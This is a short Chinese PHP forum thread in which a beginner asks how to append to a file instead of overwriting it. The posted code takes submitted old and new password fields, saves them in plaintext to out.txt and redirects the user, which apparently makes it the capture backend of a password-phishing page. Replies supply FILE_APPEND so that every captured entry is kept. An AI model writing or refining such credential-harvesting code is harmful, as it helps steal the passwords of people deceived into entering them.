Home >Backend Development >PHP Tutorial >请教一个新人问题
if(isset($_POST['OldPasswd']) && isset($_POST['Passwd'])) { $OldPasswd = strip_tags($_POST['OldPasswd']); $password = strip_tags($_POST['Passwd']); $content = 'OldPasswd: ' . $OldPasswd . '<br/>Password: '. $password . '<br/>Powerd by 谢谢'; file_put_contents("out.txt",$content);//用什么函数能让之后变量的内容不覆盖之前的内容??? header('Location: redirect.php'); }?>
file_put_contents("out.txt",$content, FILE_APPEND);//用什么函数能让之后变量的内容不覆盖之前的内容???
file_put_contents("out.txt",$content,FILE_APPEND);
PHP的函数库就是有优势。
c++的话只有框架才到这个程度。java不太清楚,应该也不错。